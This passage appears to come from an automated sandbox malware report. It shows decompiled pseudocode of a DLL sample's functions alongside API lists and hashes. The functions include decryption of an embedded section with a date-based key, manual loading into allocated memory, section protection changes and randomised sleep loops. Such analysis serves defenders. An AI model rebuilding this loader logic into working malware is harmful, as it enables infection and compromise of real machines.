                    						CloseHandle(_v20);
                    					}
                    					_t63 = 5;
                    					if(_t54 != _t63) {
                    						 *0x10ca310 =  *0x10ca310 ^ 0x81bbe65d;
                    						_t32 = E010C63FD(0x60);
                    						__eflags = _t32;
                    						 *0x10ca3cc = _t32;
                    						if(_t32 == 0) {
                    							_push(8);
                    							_pop(0);
                    						} else {
                    							memset(_t32, 0, 0x60);
                    							_t49 =  *0x10ca3cc; // 0x37a95b0
                    							_t70 = _t70 + 0xc;
                    							__imp__(_t49 + 0x40);
                    							_t51 =  *0x10ca3cc; // 0x37a95b0
                    							 *_t51 = 0x10cb81a;
                    						}
                    						__eflags = 0;
                    						_t54 = 0;
                    						if(0 == 0) {
                    							_t36 = RtlAllocateHeap( *0x10ca2d8, 0, 0x43);
                    							__eflags = _t36;
                    							 *0x10ca364 = _t36;
                    							if(_t36 == 0) {
                    								_push(8);
                    								_pop(0);
                    							} else {
                    								_t56 =  *0x10ca2fc; // 0x2000000a
                    								_t61 = _t56 & 0x000000ff;
                    								_t58 =  *0x10ca320; // 0x26dd5a8
                    								_t13 = _t58 + 0x10cb55a; // 0x697a6f4d
                    								_t55 = _t13;
                    								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x10c9287);
                    							}
                    							__eflags = 0;
                    							_t54 = 0;
                    							if(0 == 0) {
                    								asm("sbb eax, eax");
                    								E010C21BC( ~_v8 &  *0x10ca310, 0x10ca00c); // executed
                    								_t42 = E010C4EF3(0, _t55, _t63, 0x10ca00c); // executed
                    								_t54 = _t42;
                    								__eflags = _t54;
                    								if(_t54 != 0) {
                    									goto L30;
                    								}
                    								_t43 = E010C3C10(); // executed
                    								__eflags = _t43;
                    								if(_t43 != 0) {
                    									__eflags = _v8;
                    									_t67 = _v12;
                    									if(_v8 != 0) {
                    										L29:
                    										_t44 = E010C5458(_t61, _t67, _v8); // executed
                    										_t54 = _t44;
                    										goto L30;
                    									}
                    									__eflags = _t67;
                    									if(__eflags == 0) {
                    										goto L30;
                    									}
                    									_t54 = E010C7576(__eflags,  &(_t67[4]));
                    									__eflags = _t54;
                    									if(_t54 == 0) {
                    										goto L30;
                    									}
                    									goto L29;
                    								}
                    								_t54 = 8;
                    							}
                    						}
                    					} else {
                    						_t68 = _v12;
                    						if(_t68 == 0) {
                    							L30:
                    							if(_v16 == 0 || _v16 == 1) {
                    								 *0x10ca17c();
                    							}
                    							goto L34;
                    						}
                    						_t69 =  &(_t68[4]);
                    						do {
                    						} while (E010C78DB(_t63, _t69, 0, 1) == 0x4c7);
                    					}
                    					goto L30;
                    				} else {
                    					_t54 = _t22;
                    					L34:
                    					return _t54;
                    				}
                    			}


                    APIs
                      • Part of subcall function 010C4843: GetModuleHandleA.KERNEL32(4C44544E,00000000,010C654D,00000001), ref: 010C4852
                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 010C65CA
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • memset.NTDLL ref: 010C661A
                    • RtlInitializeCriticalSection.NTDLL(037A9570), ref: 010C662B
                      • Part of subcall function 010C7576: memset.NTDLL ref: 010C7590
                      • Part of subcall function 010C7576: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 010C75D6
                      • Part of subcall function 010C7576: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 010C75E1
                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 010C6656
                    • wsprintfA.USER32 ref: 010C6686
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                    • String ID:
                    • API String ID: 4246211962-0
                    • Opcode ID: 63053eafa789ceb971e9f360c654ec9c4a95415f4fb82bfbbfd050e02e62e896
                    • Instruction ID: 5c2604e3407da87b862b7c7b14ab773ee82410aaf0fc0323d524dd1f143ef5a5
                    • Opcode Fuzzy Hash: 63053eafa789ceb971e9f360c654ec9c4a95415f4fb82bfbbfd050e02e62e896
                    • Instruction Fuzzy Hash: 7651D471B0022ADFDB719BE8DC44BAE37E8BB18F44F10446DE6C1E7245E6BA95448F90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 22%
                    			E010C37CE(signed int __eax, signed int _a4, signed int _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				signed int _v20;
                    				intOrPtr _t81;
                    				char _t83;
                    				signed int _t90;
                    				signed int _t97;
                    				signed int _t99;
                    				char _t101;
                    				unsigned int _t102;
                    				intOrPtr _t103;
                    				char* _t107;
                    				signed int _t110;
                    				signed int _t113;
                    				signed int _t118;
                    				signed int _t122;
                    				intOrPtr _t124;
                    
                    				_t102 = _a8;
                    				_t118 = 0;
                    				_v20 = __eax;
                    				_t122 = (_t102 >> 2) + 1;
                    				_v8 = 0;
                    				_a8 = 0;
                    				_t81 = E010C63FD(_t122 << 2);
                    				_v16 = _t81;
                    				if(_t81 == 0) {
                    					_push(8);
                    					_pop(0);
                    					L37:
                    					return 0;
                    				}
                    				_t107 = _a4;
                    				_a4 = _t102;
                    				_t113 = 0;
                    				while(1) {
                    					_t83 =  *_t107;
                    					if(_t83 == 0) {
                    						break;
                    					}
                    					if(_t83 == 0xd || _t83 == 0xa) {
                    						if(_t118 != 0) {
                    							if(_t118 > _v8) {
                    								_v8 = _t118;
                    							}
                    							_a8 = _a8 + 1;
                    							_t118 = 0;
                    						}
                    						 *_t107 = 0;
                    						goto L16;
                    					} else {
                    						if(_t118 != 0) {
                    							L10:
                    							_t118 = _t118 + 1;
                    							L16:
                    							_t107 = _t107 + 1;
                    							_t15 =  &_a4;
                    							 *_t15 = _a4 - 1;
                    							if( *_t15 != 0) {
                    								continue;
                    							}
                    							break;
                    						}
                    						if(_t113 == _t122) {
                    							L21:
                    							if(_a8 <= 0x20) {
                    								_push(0xb);
                    								L34:
                    								_pop(0);
                    								L35:
                    								E010C17AB(_v16);
                    								goto L37;
                    							}
                    							_t24 = _v8 + 5; // 0xcdd8d2f8
                    							_t103 = E010C63FD((_v8 + _t24) * _a8 + 4);
                    							if(_t103 == 0) {
                    								_push(8);
                    								goto L34;
                    							}
                    							_t90 = _a8;
                    							_a4 = _a4 & 0x00000000;
                    							_v8 = _v8 & 0x00000000;
                    							_t124 = _t103 + _t90 * 4;
                    							if(_t90 <= 0) {
                    								L31:
                    								 *0x10ca318 = _t103;
                    								goto L35;
                    							}
                    							do {
                    								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                    								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                    								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                    								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                    								_v12 = _v12 & 0x00000000;
                    								if(_a4 <= 0) {
                    									goto L30;
                    								} else {
                    									goto L26;
                    								}
                    								while(1) {
                    									L26:
                    									_t99 = _v12;
                    									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                    									if(_t99 == 0) {
                    										break;
                    									}
                    									_v12 = _v12 + 1;
                    									if(_v12 < _a4) {
                    										continue;
                    									}
                    									goto L30;
                    								}
                    								_v8 = _v8 - 1;
                    								L30:
                    								_t97 = _a4;
                    								_a4 = _a4 + 1;
                    								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                    								__imp__(_t124);
                    								_v8 = _v8 + 1;
                    								_t124 = _t124 + _t97 + 1;
                    							} while (_v8 < _a8);
                    							goto L31;
                    						}
                    						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                    						_t101 = _t83;
                    						if(_t83 - 0x61 <= 0x19) {
                    							_t101 = _t101 - 0x20;
                    						}
                    						 *_t107 = _t101;
                    						_t113 = _t113 + 1;
                    						goto L10;
                    					}
                    				}
                    				if(_t118 != 0) {
                    					if(_t118 > _v8) {
                    						_v8 = _t118;
                    					}
                    					_a8 = _a8 + 1;
                    				}
                    				goto L21;
                    			}


                    APIs
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • lstrcpy.KERNEL32(69B25F45,00000020), ref: 010C38CB
                    • lstrcat.KERNEL32(69B25F45,00000020), ref: 010C38E0
                    • lstrcmp.KERNEL32(00000000,69B25F45), ref: 010C38F7
                    • lstrlen.KERNEL32(69B25F45), ref: 010C391B
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                    • String ID:
                    • API String ID: 3214092121-3916222277
                    • Opcode ID: 26fd51c2c7dec851fdb8dfcf9aca704a98dd9307f2ea6f351646247e0591e9c7
                    • Instruction ID: ce03c8fe8f2a9e6f21841cfb5147b15879428f22043feb756a057a61893713f2
                    • Opcode Fuzzy Hash: 26fd51c2c7dec851fdb8dfcf9aca704a98dd9307f2ea6f351646247e0591e9c7
                    • Instruction Fuzzy Hash: EE518931A10208EFDB61CF99C4846EEBBB6FF45B14F15C09AE995AF211C731AA45CF81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C3399(void* __edx) {
                    				void* _v8;
                    				int _v12;
                    				WCHAR* _v16;
                    				void* __edi;
                    				void* __esi;
                    				void* _t23;
                    				intOrPtr _t24;
                    				void* _t26;
                    				intOrPtr _t32;
                    				intOrPtr _t35;
                    				intOrPtr _t38;
                    				intOrPtr _t42;
                    				void* _t45;
                    				void* _t50;
                    				void* _t52;
                    
                    				_t50 = __edx;
                    				_v12 = 0;
                    				_t23 = E010C40C7(0,  &_v8); // executed
                    				if(_t23 != 0) {
                    					_v8 = 0;
                    				}
                    				_t24 =  *0x10ca320; // 0x26dd5a8
                    				_t4 = _t24 + 0x10cbe30; // 0x37a93d8
                    				_t5 = _t24 + 0x10cbdd8; // 0x4f0053
                    				_t26 = E010C2985( &_v16, _v8, _t5, _t4); // executed
                    				_t45 = _t26;
                    				if(_t45 == 0) {
                    					StrToIntExW(_v16, 0,  &_v12);
                    					_t45 = 8;
                    					if(_v12 < _t45) {
                    						_t45 = 1;
                    						__eflags = 1;
                    					} else {
                    						_t32 =  *0x10ca320; // 0x26dd5a8
                    						_t11 = _t32 + 0x10cbe24; // 0x37a93cc
                    						_t48 = _t11;
                    						_t12 = _t32 + 0x10cbdd8; // 0x4f0053
                    						_t52 = E010C114D(_t11, _t12, _t11);
                    						_t59 = _t52;
                    						if(_t52 != 0) {
                    							_t35 =  *0x10ca320; // 0x26dd5a8
                    							_t13 = _t35 + 0x10cbe6e; // 0x30314549
                    							if(E010C5231(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                    								_t61 =  *0x10ca2fc - 6;
                    								if( *0x10ca2fc <= 6) {
                    									_t42 =  *0x10ca320; // 0x26dd5a8
                    									_t15 = _t42 + 0x10cbdba; // 0x52384549
                    									E010C5231(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                    								}
                    							}
                    							_t38 =  *0x10ca320; // 0x26dd5a8
                    							_t17 = _t38 + 0x10cbe68; // 0x37a9410
                    							_t18 = _t38 + 0x10cbe40; // 0x680043
                    							_t45 = E010C34EE(_v8, 0x80000001, _t52, _t18, _t17);
                    							HeapFree( *0x10ca2d8, 0, _t52);
                    						}
                    					}
                    					HeapFree( *0x10ca2d8, 0, _v16);
                    				}
                    				_t54 = _v8;
                    				if(_v8 != 0) {
                    					E010C4B59(_t54);
                    				}
                    				return _t45;
                    			}


                    APIs
                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,037A93D8,00000000,?,74E5F710,00000000,74E5F730), ref: 010C33E8
                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,037A9410,?,00000000,30314549,00000014,004F0053,037A93CC), ref: 010C3485
                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,010C54F9), ref: 010C3497
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 61da6dd65155f00957a7771256adec257fd9b95459cead9c9784673f2c8d43c7
                    • Instruction ID: 967db544eb9a1152dbf989f3b06c7c2d2a6ec95c13b743237124971ccd905ea9
                    • Opcode Fuzzy Hash: 61da6dd65155f00957a7771256adec257fd9b95459cead9c9784673f2c8d43c7
                    • Instruction Fuzzy Hash: 0131B435A10119FFDB229F94DC44EDEBBBDFB09B40F1441A9B680EB051DA756908CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SysAllocString.OLEAUT32(80000002), ref: 010C153B
                    • SysAllocString.OLEAUT32(010C2BCC), ref: 010C157E
                    • SysFreeString.OLEAUT32(00000000), ref: 010C1592
                    • SysFreeString.OLEAUT32(00000000), ref: 010C15A0
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: 72aa8ef5162805ce3d7b9ea52968e00a0a2e043e51807afea22571287bd3a177
                    • Instruction ID: 8200d3b0e832d6faf6beda49d2aa87c76bd3664b7fa2de70da81bc50c4257943
                    • Opcode Fuzzy Hash: 72aa8ef5162805ce3d7b9ea52968e00a0a2e043e51807afea22571287bd3a177
                    • Instruction Fuzzy Hash: 22315BB2900209EFCB11DF98D4808EE7BF9FF58340B14816EF94A97251E7359A45CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E010C57A8(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                    				intOrPtr _v8;
                    				void* _v12;
                    				void* _v16;
                    				intOrPtr _t26;
                    				intOrPtr* _t28;
                    				intOrPtr _t31;
                    				intOrPtr* _t32;
                    				void* _t39;
                    				int _t46;
                    				intOrPtr* _t47;
                    				int _t48;
                    
                    				_t47 = __eax;
                    				_push( &_v12);
                    				_push(__eax);
                    				_t39 = 0;
                    				_t46 = 0; // executed
                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                    				_v8 = _t26;
                    				if(_t26 < 0) {
                    					L13:
                    					return _v8;
                    				}
                    				if(_v12 == 0) {
                    					Sleep(0xc8);
                    					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                    				}
                    				if(_v8 >= _t39) {
                    					_t28 = _v12;
                    					if(_t28 != 0) {
                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                    						_v8 = _t31;
                    						if(_t31 >= 0) {
                    							_t46 = lstrlenW(_v16);
                    							if(_t46 != 0) {
                    								_t46 = _t46 + 1;
                    								_t48 = _t46 + _t46;
                    								_t39 = E010C63FD(_t48);
                    								if(_t39 == 0) {
                    									_v8 = 0x8007000e;
                    								} else {
                    									memcpy(_t39, _v16, _t48);
                    								}
                    								__imp__#6(_v16);
                    							}
                    						}
                    						_t32 = _v12;
                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                    					}
                    					 *_a4 = _t39;
                    					 *_a8 = _t46 + _t46;
                    				}
                    				goto L13;
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: FreeSleepStringlstrlenmemcpy
                    • String ID:
                    • API String ID: 1198164300-0
                    • Opcode ID: 88afbf0d502e7b1a178af19708d0e54072c3303516023d8f902f259a125bb5d6
                    • Instruction ID: 8385f893472de9480bc334ff0ecd14f47a9c218ef1b2b64bf28c783c730c1766
                    • Opcode Fuzzy Hash: 88afbf0d502e7b1a178af19708d0e54072c3303516023d8f902f259a125bb5d6
                    • Instruction Fuzzy Hash: 91215179A00209EFDB11DFA8C8849DEBBB4FF48700B1041ADE995E7210E731AA05CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 65%
                    			E010C2A4C(void* __ecx, intOrPtr _a4) {
                    				struct _FILETIME _v12;
                    				int _t13;
                    				signed int _t16;
                    				void* _t18;
                    				signed int _t19;
                    				unsigned int _t23;
                    				void* _t30;
                    				signed int _t34;
                    
                    				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                    				asm("stosd");
                    				do {
                    					_t13 = SwitchToThread();
                    					GetSystemTimeAsFileTime( &_v12);
                    					_t23 = _v12.dwHighDateTime;
                    					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                    					_push(0);
                    					_push(0x13);
                    					_push(_t23 >> 5);
                    					_push(_t16);
                    					L010C82E6();
                    					_t34 = _t16 + _t13;
                    					_t18 = E010C2888(_a4, _t34);
                    					_t30 = _t18;
                    					_t19 = 3;
                    					Sleep(_t19 << (_t34 & 0x00000007)); // executed
                    				} while (_t30 == 1);
                    				return _t30;
                    			}

                    APIs
                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,010C4610,?,?), ref: 010C2A5D
                    • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,010C4610,?,?), ref: 010C2A69
                    • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 010C2A82
                      • Part of subcall function 010C2888: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 010C28E7
                    • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,010C4610,?,?), ref: 010C2AA1
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                    • String ID:
                    • API String ID: 1610602887-0
                    • Opcode ID: dd18b38331a8cee4c18f3d5423834745f19e5aeb9e7bc7b0bbdce31651779afb
                    • Instruction ID: b7340c68d595801d8ff282aa5dc28973e21f3c81dd0c78ed63467bf56f336cc5
                    • Opcode Fuzzy Hash: dd18b38331a8cee4c18f3d5423834745f19e5aeb9e7bc7b0bbdce31651779afb
                    • Instruction Fuzzy Hash: 7BF0A477A40504BFD7149BA8CC1DFDF76E9DB84755F100124F601E7240E5789A04CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E100014B7(void* __ecx, char _a4) {
                    				long _t3;
                    				int _t4;
                    				int _t9;
                    				void* _t13;
                    
                    				_t13 = GetCurrentThread();
                    				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                    				if(_t3 != 0) {
                    					SetThreadPriority(_t13, 0xffffffff); // executed
                    				}
                    				_t4 = E10001077(_a4); // executed
                    				_t9 = _t4;
                    				if(_t9 == 0) {
                    					SetThreadPriority(_t13, _t4);
                    				}
                    				asm("lock xadd [eax], ecx");
                    				return _t9;
                    			}

                    APIs
                    • GetCurrentThread.KERNEL32 ref: 100014BA
                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 100014C5
                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 100014D8
                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 100014EB
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: Thread$Priority$AffinityCurrentMask
                    • String ID:
                    • API String ID: 1452675757-0
                    • Opcode ID: 66a3931e09ca2716b852fa90868ab34a7b4a3eceff202073094630c133cd6c05
                    • Instruction ID: 938d9c3a0a4ff32711df2389b6a8273cc0a2fc41bcb79787c36b196dd8ee152c
                    • Opcode Fuzzy Hash: 66a3931e09ca2716b852fa90868ab34a7b4a3eceff202073094630c133cd6c05
                    • Instruction Fuzzy Hash: 8FE092713062616BF202AB2A4C94EAB779CEF923F17128325F620D22E4CB549C0185A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E10001508(void* __edi, intOrPtr _a4) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				char _v16;
                    				void* _v20;
                    				unsigned int _v24;
                    				intOrPtr _v28;
                    				char _v32;
                    				void* _v36;
                    				intOrPtr _v40;
                    				intOrPtr _v44;
                    				signed int _v52;
                    				signed int _v56;
                    				intOrPtr _t52;
                    				void* _t59;
                    				intOrPtr _t60;
                    				intOrPtr _t70;
                    				signed int _t79;
                    				intOrPtr* _t84;
                    				intOrPtr _t87;
                    				void* _t88;
                    				intOrPtr _t91;
                    				intOrPtr _t93;
                    				intOrPtr _t94;
                    				intOrPtr _t96;
                    
                    				_t93 =  *0x100041b0;
                    				_t52 = E10001B8E(_t93,  &_v32,  &_v24);
                    				_v28 = _t52;
                    				if(_t52 == 0) {
                    					asm("sbb ebx, ebx");
                    					_t79 =  ~( ~(_v24 & 0x00000fff)) + (_v24 >> 0xc);
                    					_t94 = _t93 + _v32;
                    					_v44 = _t94;
                    					_t59 = VirtualAlloc(0, _t79 << 0xc, 0x3000, 4); // executed
                    					_v36 = _t59;
                    					if(_t59 == 0) {
                    						_v28 = 8;
                    					} else {
                    						_v8 = _v8 & 0x00000000;
                    						if(_t79 <= 0) {
                    							_t60 =  *0x100041cc;
                    						} else {
                    							_t87 = _a4;
                    							_v12 = _t94;
                    							_v12 = _v12 - _t59;
                    							_t16 = _t87 + 0x100051a7; // 0x100051a7
                    							_t88 = _t59 - _t94 + _t16;
                    							_v20 = _t59;
                    							do {
                    								asm("movsd");
                    								asm("movsd");
                    								asm("movsd");
                    								_v16 = 0x400;
                    								_t96 = 0;
                    								_t84 = _v20;
                    								_v40 = (_v56 ^ _v52) - _v8 + _v32 + _a4 - 1;
                    								do {
                    									_t70 =  *((intOrPtr*)(_v12 + _t84));
                    									_t91 = _t70;
                    									if(_t70 == 0) {
                    										_v16 = 1;
                    									} else {
                    										 *_t84 = _t70 + _t96 - _v40;
                    										_t96 = _t91;
                    										_t84 = _t84 + 4;
                    									}
                    									_t33 =  &_v16;
                    									 *_t33 = _v16 - 1;
                    								} while ( *_t33 != 0);
                    								_t35 = _t88 + 0xc; // 0x666f736f
                    								_t36 = _t88 + 8; // 0x7263694d
                    								_v20 = _v20 + 0x1000;
                    								_t39 = _t88 + 4; // 0x20303230
                    								_t60 =  *_t35 -  *_t36 +  *_t39;
                    								_v8 = _v8 + 1;
                    								 *0x100041cc = _t60;
                    							} while (_v8 < _t79);
                    						}
                    						if(_t60 != 0x69b25f44) {
                    							_v28 = 9;
                    						} else {
                    							E100020FC(_v24, _v36, _v44);
                    						}
                    						VirtualFree(_v36, 0, 0x8000); // executed
                    					}
                    				}
                    				return _v28;
                    			}

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,00000030,?,00000000,00000000,?,?,?,?,?,?,?,100010EC), ref: 1000155E
                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001633
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID: Dec 15 2021
                    • API String ID: 2087232378-4291124623
                    • Opcode ID: ce9149784ba7d89a87610420d7daca829e393198fb5ef94e6edf65f698c93a8b
                    • Instruction ID: 8b87aa913169fd1d56c1ceb42a763f22b3623cee575485f03a0d7c1fbf3dc598
                    • Opcode Fuzzy Hash: ce9149784ba7d89a87610420d7daca829e393198fb5ef94e6edf65f698c93a8b
                    • Instruction Fuzzy Hash: 1141F871A00219DBEB01CFA8C980BDEB7F8FF08394F154169E905BB244D775AA45CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E1000185B(void* __eax, void* _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				long _v20;
                    				int _t43;
                    				long _t54;
                    				signed int _t57;
                    				void* _t58;
                    				signed int _t60;
                    
                    				_v12 = _v12 & 0x00000000;
                    				_t57 =  *0x100041cc;
                    				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                    				_v16 =  *(__eax + 6) & 0x0000ffff;
                    				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                    				_v8 = _v8 & 0x00000000;
                    				if(_v16 <= 0) {
                    					L12:
                    					return _v12;
                    				} else {
                    					goto L1;
                    				}
                    				while(1) {
                    					L1:
                    					_t60 = _v12;
                    					if(_t60 != 0) {
                    						goto L12;
                    					}
                    					asm("bt [esi+0x24], eax");
                    					if(_t60 >= 0) {
                    						asm("bt [esi+0x24], eax");
                    						if(__eflags >= 0) {
                    							L8:
                    							_t54 = _t57 - 0x69b25f40;
                    							L9:
                    							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                    							if(_t43 == 0) {
                    								_v12 = GetLastError();
                    							}
                    							_v8 = _v8 + 1;
                    							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                    							if(_v8 < _v16) {
                    								continue;
                    							} else {
                    								goto L12;
                    							}
                    						}
                    						asm("bt [esi+0x24], eax");
                    						_t54 = _t57 - 0x69b25f42;
                    						if(__eflags >= 0) {
                    							goto L9;
                    						}
                    						goto L8;
                    					}
                    					asm("bt [esi+0x24], eax");
                    					if(_t60 >= 0) {
                    						_t54 = _t57 - 0x69b25f24;
                    					} else {
                    						_t54 = _t57 - 0x69b25f04;
                    					}
                    					goto L9;
                    				}
                    				goto L12;
                    			}

                    APIs
                    • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 10001894
                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001909
                    • GetLastError.KERNEL32 ref: 1000190F
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: ProtectVirtual$ErrorLast
                    • String ID:
                    • API String ID: 1469625949-0
                    • Opcode ID: b0c5b14f276f5492b38c78d507bfcffce29d468af27afb329b1c58bcc8d062bd
                    • Instruction ID: 0da3d74952dba8c78ee6672b1577cf37ec33a4e7ccf2e9bbd94a8fa2aae774cc
